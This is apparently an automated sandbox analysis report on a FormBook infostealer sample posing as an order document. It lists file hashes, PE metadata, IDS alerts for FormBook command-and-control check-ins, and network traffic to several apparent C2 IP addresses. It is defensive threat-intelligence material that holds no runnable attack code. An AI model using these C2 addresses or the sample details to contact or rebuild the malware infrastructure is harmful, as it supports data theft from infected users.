                          EGR7RZv5Km.elfGet hashmaliciousMirai, MoobotBrowse
                          • 43.7.23.106
                          1CZlhmRsza.elfGet hashmaliciousMirai, MoobotBrowse
                          • 42.141.165.209
                          s4WsI8Qcm4.elfGet hashmaliciousMirai, MoobotBrowse
                          • 43.128.90.95
                          Ul8gIL4P3u.elfGet hashmaliciousMirai, MoobotBrowse
                          • 43.6.117.205

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\indent PWS-020199.exe.log

                          Download File
                          Process:C:\Users\user\Desktop\indent PWS-020199.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1216
                          Entropy (8bit):5.34331486778365
                          Encrypted:false
                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                          Malicious:true
                          Reputation:high, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                          C:\Users\user\AppData\Local\Temp\3e3-f82u

                          Download File
                          Process:C:\Windows\SysWOW64\netiougc.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                          Category:dropped
                          Size (bytes):114688
                          Entropy (8bit):0.9746603542602881
                          Encrypted:false
                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.913249107659337
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                          • Win32 Executable (generic) a (10002005/4) 49.93%
                          • Windows Screen Saver (13104/52) 0.07%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:indent PWS-020199.exe
                          File size:727'560 bytes
                          MD5:66800cae69c4278c8a33921d624b7528
                          SHA1:e3abc9476cde1dc7ca5a2baa546534d625c0d325
                          SHA256:64874958438945a29c66851bb23bcb9483955577e941e156d559885cca4a6910
                          SHA512:aa5e313dfb486ef208c8f6397c9d7a73b1dfc15aa9dd76f131a6a2def5bd67329ba504496e99c70fa7d047d74f8c0b25865193479692d8f09ddab671acc24544
                          SSDEEP:12288:f6mu8wtNPu29Q/ACCLw74+lwjMCSeFZjYpNHXkQXMa0rTpd8lKZ8B2i2vXtCYKzk:ivh9Q/7CM7OjzS20pNHXkWFLGV3KzzsR
                          TLSH:27F412247B64EF22E17E4FF10634F50197F6250F68B5D4084ED6A4EB64A6F8047B1A8F
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....\...............0.................. ........@.. .......................@............@................................

                          File Icon

                          Icon Hash:3323c38baeb2b8a5

                          Static PE Info

                          General

                          Entrypoint:0x4ae90e
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0xCB5C881E [Fri Feb 11 21:03:26 2078 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                          Authenticode Signature

                          Signature Valid:false
                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                          Signature Validation Error:The digital signature of the object did not verify
                          Error Number:-2146869232
                          Not Before, Not After
                          • 13/11/2018 00:00:00 08/11/2021 23:59:59
                          Subject Chain
                          • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                          Version:3
                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                          Serial:7C1118CBBADC95DA3752C46E47A27438

                          Entrypoint Preview

                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xae8bc0x4f.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x14e8.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0xae4000x3608
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0xab9a00x70.text
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000xac9140xaca000ce84c843d3f5190f2bdf06f44bcd1c6False0.9338440781136857data7.919292677582139IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0xb00000x14e80x1600aa436ddc566586f36abd3037316b060cFalse0.7386363636363636data7.234657283799016IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0xb20000xc0x20094b5c1a06eddbe8c9189cfdbca6ad2d9False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0xb01300xe89PNG image data, 224 x 224, 8-bit/color RGBA, non-interlaced0.902176834184359
                          RT_GROUP_ICON0xb0fbc0x14data1.1
                          RT_VERSION0xb0fd00x32adata0.4641975308641975
                          RT_MANIFEST0xb12fc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                          Imports

                          DLLImport
                          mscoree.dll_CorExeMain

                          Network Behavior

                          Snort IDS Alerts

                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          07/01/24-15:12:03.875197TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974680192.168.2.466.96.162.130
                          07/01/24-15:12:44.166991TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975880192.168.2.443.132.189.227
                          07/01/24-15:12:17.123480TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975080192.168.2.4203.161.49.220
                          07/01/24-15:12:46.704903TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975980192.168.2.443.132.189.227
                          07/01/24-15:12:30.379024TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975480192.168.2.4142.250.74.211
                          07/01/24-15:12:33.079742TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975580192.168.2.4142.250.74.211
                          07/01/24-15:12:06.407420TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974780192.168.2.466.96.162.130
                          07/01/24-15:12:19.661497TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975180192.168.2.4203.161.49.220

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jul 1, 2024 15:11:47.890582085 CEST4974480192.168.2.481.4.100.198
                          Jul 1, 2024 15:11:47.895448923 CEST804974481.4.100.198192.168.2.4
                          Jul 1, 2024 15:11:47.895612955 CEST4974480192.168.2.481.4.100.198
                          Jul 1, 2024 15:11:47.898155928 CEST4974480192.168.2.481.4.100.198
                          Jul 1, 2024 15:11:47.903528929 CEST804974481.4.100.198192.168.2.4
                          Jul 1, 2024 15:11:48.515640974 CEST804974481.4.100.198192.168.2.4
                          Jul 1, 2024 15:11:48.515662909 CEST804974481.4.100.198192.168.2.4
                          Jul 1, 2024 15:11:48.515803099 CEST4974480192.168.2.481.4.100.198
                          Jul 1, 2024 15:11:48.519249916 CEST4974480192.168.2.481.4.100.198
                          Jul 1, 2024 15:11:48.524514914 CEST804974481.4.100.198192.168.2.4
                          Jul 1, 2024 15:12:03.868371010 CEST4974680192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:03.873194933 CEST804974666.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:03.873312950 CEST4974680192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:03.875196934 CEST4974680192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:03.880048990 CEST804974666.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:04.359752893 CEST804974666.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:04.359821081 CEST804974666.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:04.359885931 CEST4974680192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:05.381691933 CEST4974680192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:06.400336027 CEST4974780192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:06.405458927 CEST804974766.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:06.405572891 CEST4974780192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:06.407419920 CEST4974780192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:06.412395954 CEST804974766.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:06.882215977 CEST804974766.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:06.883198977 CEST804974766.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:06.883295059 CEST4974780192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:07.912919044 CEST4974780192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:08.931278944 CEST4974880192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:08.936135054 CEST804974866.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:08.936270952 CEST4974880192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:08.938555002 CEST4974880192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:08.946736097 CEST804974866.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:08.946758032 CEST804974866.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:08.946832895 CEST804974866.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:08.946844101 CEST804974866.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:08.946917057 CEST804974866.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:08.946928978 CEST804974866.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:08.946974993 CEST804974866.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:08.946985006 CEST804974866.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:08.947010040 CEST804974866.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:09.422924995 CEST804974866.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:09.422971010 CEST804974866.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:09.423069954 CEST4974880192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:10.444113970 CEST4974880192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:11.463094950 CEST4974980192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:11.468208075 CEST804974966.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:11.468306065 CEST4974980192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:11.469964981 CEST4974980192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:11.474780083 CEST804974966.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:11.975930929 CEST804974966.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:11.975956917 CEST804974966.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:11.976089954 CEST4974980192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:11.978569031 CEST4974980192.168.2.466.96.162.130
                          Jul 1, 2024 15:12:11.983786106 CEST804974966.96.162.130192.168.2.4
                          Jul 1, 2024 15:12:17.116988897 CEST4975080192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:17.121834040 CEST8049750203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:17.121918917 CEST4975080192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:17.123480082 CEST4975080192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:17.128477097 CEST8049750203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:17.749577999 CEST8049750203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:17.749763012 CEST8049750203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:17.749840021 CEST4975080192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:18.631710052 CEST4975080192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:19.654422998 CEST4975180192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:19.659241915 CEST8049751203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:19.659337997 CEST4975180192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:19.661497116 CEST4975180192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:19.666220903 CEST8049751203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:20.280612946 CEST8049751203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:20.280783892 CEST8049751203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:20.280837059 CEST4975180192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:21.162894011 CEST4975180192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:22.181463003 CEST4975280192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:22.186346054 CEST8049752203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:22.186440945 CEST4975280192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:22.188563108 CEST4975280192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:22.193795919 CEST8049752203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:22.193819046 CEST8049752203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:22.193866968 CEST8049752203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:22.193877935 CEST8049752203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:22.193922997 CEST8049752203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:22.193933964 CEST8049752203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:22.193965912 CEST8049752203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:22.194032907 CEST8049752203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:22.194042921 CEST8049752203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:22.864697933 CEST8049752203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:22.864728928 CEST8049752203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:22.864773989 CEST4975280192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:23.694082975 CEST4975280192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:24.712924004 CEST4975380192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:24.717799902 CEST8049753203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:24.718400002 CEST4975380192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:24.720112085 CEST4975380192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:24.724900007 CEST8049753203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:25.323398113 CEST8049753203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:25.323697090 CEST8049753203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:25.323746920 CEST4975380192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:25.326030970 CEST4975380192.168.2.4203.161.49.220
                          Jul 1, 2024 15:12:25.330741882 CEST8049753203.161.49.220192.168.2.4
                          Jul 1, 2024 15:12:30.369833946 CEST4975480192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:30.376801014 CEST8049754142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:30.377017021 CEST4975480192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:30.379024029 CEST4975480192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:30.385893106 CEST8049754142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:31.009145975 CEST8049754142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:31.009171009 CEST8049754142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:31.009217024 CEST8049754142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:31.009249926 CEST4975480192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:31.009288073 CEST4975480192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:31.881576061 CEST4975480192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:32.900160074 CEST4975580192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:33.077667952 CEST8049755142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:33.077764988 CEST4975580192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:33.079741955 CEST4975580192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:33.086625099 CEST8049755142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:33.724863052 CEST8049755142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:33.724921942 CEST8049755142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:33.725075960 CEST8049755142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:33.725087881 CEST4975580192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:33.725143909 CEST4975580192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:34.584811926 CEST4975580192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:35.603209019 CEST4975680192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:35.608072042 CEST8049756142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:35.608206034 CEST4975680192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:35.610552073 CEST4975680192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:35.615451097 CEST8049756142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:35.615468025 CEST8049756142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:35.615477085 CEST8049756142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:35.615480900 CEST8049756142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:35.615551949 CEST8049756142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:35.615561008 CEST8049756142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:35.615601063 CEST8049756142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:35.615611076 CEST8049756142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:35.615628004 CEST8049756142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:36.244460106 CEST8049756142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:36.244477987 CEST8049756142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:36.244548082 CEST4975680192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:36.244914055 CEST8049756142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:36.244968891 CEST4975680192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:37.116079092 CEST4975680192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:38.134972095 CEST4975780192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:38.139918089 CEST8049757142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:38.140090942 CEST4975780192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:38.142066956 CEST4975780192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:38.146822929 CEST8049757142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:38.777293921 CEST8049757142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:38.777333975 CEST8049757142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:38.777345896 CEST8049757142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:38.777463913 CEST4975780192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:38.780472040 CEST4975780192.168.2.4142.250.74.211
                          Jul 1, 2024 15:12:38.785231113 CEST8049757142.250.74.211192.168.2.4
                          Jul 1, 2024 15:12:44.154567003 CEST4975880192.168.2.443.132.189.227
                          Jul 1, 2024 15:12:44.159455061 CEST804975843.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:44.162874937 CEST4975880192.168.2.443.132.189.227
                          Jul 1, 2024 15:12:44.166990995 CEST4975880192.168.2.443.132.189.227
                          Jul 1, 2024 15:12:44.171848059 CEST804975843.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:45.678559065 CEST4975880192.168.2.443.132.189.227
                          Jul 1, 2024 15:12:45.725718975 CEST804975843.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:46.697633982 CEST4975980192.168.2.443.132.189.227
                          Jul 1, 2024 15:12:46.702663898 CEST804975943.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:46.702743053 CEST4975980192.168.2.443.132.189.227
                          Jul 1, 2024 15:12:46.704902887 CEST4975980192.168.2.443.132.189.227
                          Jul 1, 2024 15:12:46.709738970 CEST804975943.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:48.210036039 CEST4975980192.168.2.443.132.189.227
                          Jul 1, 2024 15:12:48.261796951 CEST804975943.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:49.228611946 CEST4976080192.168.2.443.132.189.227
                          Jul 1, 2024 15:12:49.233855009 CEST804976043.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:49.233939886 CEST4976080192.168.2.443.132.189.227
                          Jul 1, 2024 15:12:49.236515045 CEST4976080192.168.2.443.132.189.227
                          Jul 1, 2024 15:12:49.241496086 CEST804976043.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:49.241519928 CEST804976043.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:49.241624117 CEST804976043.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:49.241805077 CEST804976043.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:49.241851091 CEST804976043.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:49.241862059 CEST804976043.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:49.241929054 CEST804976043.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:49.241939068 CEST804976043.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:49.241950035 CEST804976043.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:50.741086006 CEST4976080192.168.2.443.132.189.227
                          Jul 1, 2024 15:12:50.789896965 CEST804976043.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:51.760092020 CEST4976180192.168.2.443.132.189.227
                          Jul 1, 2024 15:12:51.768155098 CEST804976143.132.189.227192.168.2.4
                          Jul 1, 2024 15:12:51.768337011 CEST4976180192.168.2.443.132.189.227
                          Jul 1, 2024 15:12:51.772454023 CEST4976180192.168.2.443.132.189.227
                          Jul 1, 2024 15:12:51.780443907 CEST804976143.132.189.227192.168.2.4
                          Jul 1, 2024 15:13:05.547382116 CEST804975843.132.189.227192.168.2.4
                          Jul 1, 2024 15:13:05.547482967 CEST4975880192.168.2.443.132.189.227
                          Jul 1, 2024 15:13:08.108520985 CEST804975943.132.189.227192.168.2.4
                          Jul 1, 2024 15:13:08.108582020 CEST4975980192.168.2.443.132.189.227

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jul 1, 2024 15:11:42.830929995 CEST5404553192.168.2.41.1.1.1
                          Jul 1, 2024 15:11:42.847588062 CEST53540451.1.1.1192.168.2.4
                          Jul 1, 2024 15:11:47.853863001 CEST6339953192.168.2.41.1.1.1
                          Jul 1, 2024 15:11:47.884944916 CEST53633991.1.1.1192.168.2.4
                          Jul 1, 2024 15:12:03.557235956 CEST6121253192.168.2.41.1.1.1
                          Jul 1, 2024 15:12:03.865873098 CEST53612121.1.1.1192.168.2.4
